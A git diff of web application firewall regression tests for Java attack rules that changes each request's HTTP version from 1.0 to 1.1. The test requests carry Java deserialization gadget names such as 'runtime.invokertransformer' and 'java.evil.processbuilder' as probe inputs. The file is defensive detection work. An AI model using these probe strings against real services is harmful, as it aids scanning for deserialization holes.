@@ -1015,7 +1015,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1041,7 +1041,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1067,7 +1067,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -1093,7 +1093,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
index 7d5a2ef38..68dd37850 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml
@@ -18,7 +18,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.clonetransformer"
         output:
           log:
@@ -38,7 +38,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "runtime.clonetransformer=test"
         output:
           log:
@@ -59,7 +59,7 @@ tests:
             Cookie: test=runtime.clonetransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -80,7 +80,7 @@ tests:
             Cookie: runtime.clonetransformer=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -101,7 +101,7 @@ tests:
             test: runtime.clonetransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -121,7 +121,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"runtime.clonetransformer\">element_value</element></xml>"
         output:
           log:
@@ -141,7 +141,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.clonetransformer</element></xml>"
         output:
           log:
@@ -161,7 +161,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.clonetransformer</element></l3></l2></l1></xml>"
         output:
           log:
@@ -181,7 +181,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.clonetransformer"
         output:
           log:
@@ -201,7 +201,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"runtime.clonetransformer\"}"
         output:
           log:
@@ -221,7 +221,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"runtime.clonetransformer\": \"test\"}"
         output:
           log:
@@ -241,7 +241,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.forclosure"
         output:
           log:
@@ -261,7 +261,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "runtime.forclosure=test"
         output:
           log:
@@ -282,7 +282,7 @@ tests:
             Cookie: test=runtime.forclosure
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -303,7 +303,7 @@ tests:
             Cookie: runtime.forclosure=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -324,7 +324,7 @@ tests:
             test: runtime.forclosure
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -344,7 +344,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"runtime.forclosure\">element_value</element></xml>"
         output:
           log:
@@ -364,7 +364,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.forclosure</element></xml>"
         output:
           log:
@@ -384,7 +384,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.forclosure</element></l3></l2></l1></xml>"
         output:
           log:
@@ -404,7 +404,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.forclosure"
         output:
           log:
@@ -424,7 +424,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"runtime.forclosure\"}"
         output:
           log:
@@ -444,7 +444,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"runtime.forclosure\": \"test\"}"
         output:
           log:
@@ -464,7 +464,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.instantiatefactory"
         output:
           log:
@@ -484,7 +484,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "runtime.instantiatefactory=test"
         output:
           log:
@@ -505,7 +505,7 @@ tests:
             Cookie: test=runtime.instantiatefactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -526,7 +526,7 @@ tests:
             Cookie: runtime.instantiatefactory=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -547,7 +547,7 @@ tests:
             test: runtime.instantiatefactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -567,7 +567,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"runtime.instantiatefactory\">element_value</element></xml>"
         output:
           log:
@@ -587,7 +587,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.instantiatefactory</element></xml>"
         output:
           log:
@@ -607,7 +607,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.instantiatefactory</element></l3></l2></l1></xml>"
         output:
           log:
@@ -627,7 +627,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.instantiatefactory"
         output:
           log:
@@ -647,7 +647,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"runtime.instantiatefactory\"}"
         output:
           log:
@@ -667,7 +667,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"runtime.instantiatefactory\": \"test\"}"
         output:
           log:
@@ -687,7 +687,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.instantiatetransformer"
         output:
           log:
@@ -707,7 +707,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "runtime.instantiatetransformer=test"
         output:
           log:
@@ -728,7 +728,7 @@ tests:
             Cookie: test=runtime.instantiatetransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -749,7 +749,7 @@ tests:
             Cookie: runtime.instantiatetransformer=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -770,7 +770,7 @@ tests:
             test: runtime.instantiatetransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -790,7 +790,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"runtime.instantiatetransformer\">element_value</element></xml>"
         output:
           log:
@@ -810,7 +810,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.instantiatetransformer</element></xml>"
         output:
           log:
@@ -830,7 +830,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.instantiatetransformer</element></l3></l2></l1></xml>"
         output:
           log:
@@ -850,7 +850,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.instantiatetransformer"
         output:
           log:
@@ -870,7 +870,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"runtime.instantiatetransformer\"}"
         output:
           log:
@@ -890,7 +890,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"runtime.instantiatetransformer\": \"test\"}"
         output:
           log:
@@ -910,7 +910,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.invokertransformer"
         output:
           log:
@@ -930,7 +930,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "runtime.invokertransformer=test"
         output:
           log:
@@ -951,7 +951,7 @@ tests:
             Cookie: test=runtime.invokertransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -972,7 +972,7 @@ tests:
             Cookie: runtime.invokertransformer=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -993,7 +993,7 @@ tests:
             test: runtime.invokertransformer
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1013,7 +1013,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"runtime.invokertransformer\">element_value</element></xml>"
         output:
           log:
@@ -1033,7 +1033,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.invokertransformer</element></xml>"
         output:
           log:
@@ -1053,7 +1053,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.invokertransformer</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1073,7 +1073,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.invokertransformer"
         output:
           log:
@@ -1093,7 +1093,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"runtime.invokertransformer\"}"
         output:
           log:
@@ -1113,7 +1113,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"runtime.invokertransformer\": \"test\"}"
         output:
           log:
@@ -1133,7 +1133,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.prototypeclonefactory"
         output:
           log:
@@ -1153,7 +1153,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "runtime.prototypeclonefactory=test"
         output:
           log:
@@ -1174,7 +1174,7 @@ tests:
             Cookie: test=runtime.prototypeclonefactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1195,7 +1195,7 @@ tests:
             Cookie: runtime.prototypeclonefactory=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1216,7 +1216,7 @@ tests:
             test: runtime.prototypeclonefactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1236,7 +1236,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"runtime.prototypeclonefactory\">element_value</element></xml>"
         output:
           log:
@@ -1256,7 +1256,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.prototypeclonefactory</element></xml>"
         output:
           log:
@@ -1276,7 +1276,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.prototypeclonefactory</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1296,7 +1296,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.prototypeclonefactory"
         output:
           log:
@@ -1316,7 +1316,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"runtime.prototypeclonefactory\"}"
         output:
           log:
@@ -1336,7 +1336,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"runtime.prototypeclonefactory\": \"test\"}"
         output:
           log:
@@ -1356,7 +1356,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.prototypeserializationfactory"
         output:
           log:
@@ -1376,7 +1376,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "runtime.prototypeserializationfactory=test"
         output:
           log:
@@ -1397,7 +1397,7 @@ tests:
             Cookie: test=runtime.prototypeserializationfactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1418,7 +1418,7 @@ tests:
             Cookie: runtime.prototypeserializationfactory=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1439,7 +1439,7 @@ tests:
             test: runtime.prototypeserializationfactory
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1459,7 +1459,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"runtime.prototypeserializationfactory\">element_value</element></xml>"
         output:
           log:
@@ -1479,7 +1479,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.prototypeserializationfactory</element></xml>"
         output:
           log:
@@ -1499,7 +1499,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.prototypeserializationfactory</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1519,7 +1519,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.prototypeserializationfactory"
         output:
           log:
@@ -1539,7 +1539,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"runtime.prototypeserializationfactory\"}"
         output:
           log:
@@ -1559,7 +1559,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"runtime.prototypeserializationfactory\": \"test\"}"
         output:
           log:
@@ -1579,7 +1579,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.whileclosure"
         output:
           log:
@@ -1599,7 +1599,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "runtime.whileclosure=test"
         output:
           log:
@@ -1620,7 +1620,7 @@ tests:
             Cookie: test=runtime.whileclosure
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1641,7 +1641,7 @@ tests:
             Cookie: runtime.whileclosure=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1662,7 +1662,7 @@ tests:
             test: runtime.whileclosure
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1682,7 +1682,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"runtime.whileclosure\">element_value</element></xml>"
         output:
           log:
@@ -1702,7 +1702,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">runtime.whileclosure</element></xml>"
         output:
           log:
@@ -1722,7 +1722,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">runtime.whileclosure</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1742,7 +1742,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=runtime.whileclosure"
         output:
           log:
@@ -1762,7 +1762,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"runtime.whileclosure\"}"
         output:
           log:
@@ -1782,7 +1782,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"runtime.whileclosure\": \"test\"}"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
index b9aa24729..4b2d387e4 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml
@@ -18,7 +18,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.evil.runtime"
         output:
           log:
@@ -38,7 +38,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.evil.runtime=test"
         output:
           log:
@@ -59,7 +59,7 @@ tests:
             Cookie: test=java.evil.runtime
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -80,7 +80,7 @@ tests:
             Cookie: java.evil.runtime=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -101,7 +101,7 @@ tests:
             test: java.evil.runtime
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -121,7 +121,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.evil.runtime\">element_value</element></xml>"
         output:
           log:
@@ -141,7 +141,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.evil.runtime</element></xml>"
         output:
           log:
@@ -161,7 +161,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.evil.runtime</element></l3></l2></l1></xml>"
         output:
           log:
@@ -181,7 +181,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.evil.runtime"
         output:
           log:
@@ -201,7 +201,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.evil.runtime\"}"
         output:
           log:
@@ -221,7 +221,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.evil.runtime\": \"test\"}"
         output:
           log:
@@ -241,7 +241,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.evil.processbuilder"
         output:
           log:
@@ -261,7 +261,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.evil.processbuilder=test"
         output:
           log:
@@ -282,7 +282,7 @@ tests:
             Cookie: test=java.evil.processbuilder
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -303,7 +303,7 @@ tests:
             Cookie: java.evil.processbuilder=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -324,7 +324,7 @@ tests:
             test: java.evil.processbuilder
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -344,7 +344,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.evil.processbuilder\">element_value</element></xml>"
         output:
           log:
@@ -364,7 +364,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.evil.processbuilder</element></xml>"
         output:
           log:
@@ -384,7 +384,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.evil.processbuilder</element></l3></l2></l1></xml>"
         output:
           log:
@@ -404,7 +404,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.evil.processbuilder"
         output:
           log:
@@ -424,7 +424,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.evil.processbuilder\"}"
         output:
           log:
@@ -444,7 +444,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.evil.processbuilder\": \"test\"}"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
index 9ab732eb5..c49f7c84b 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml
@@ -18,7 +18,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=cnVudGltZQ"
         output:
           log:
@@ -38,7 +38,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "cnVudGltZQ=test"
         output:
           log:
@@ -59,7 +59,7 @@ tests:
             Cookie: test=cnVudGltZQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -79,7 +79,7 @@ tests:
             Cookie: cnVudGltZQ=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -99,7 +99,7 @@ tests:
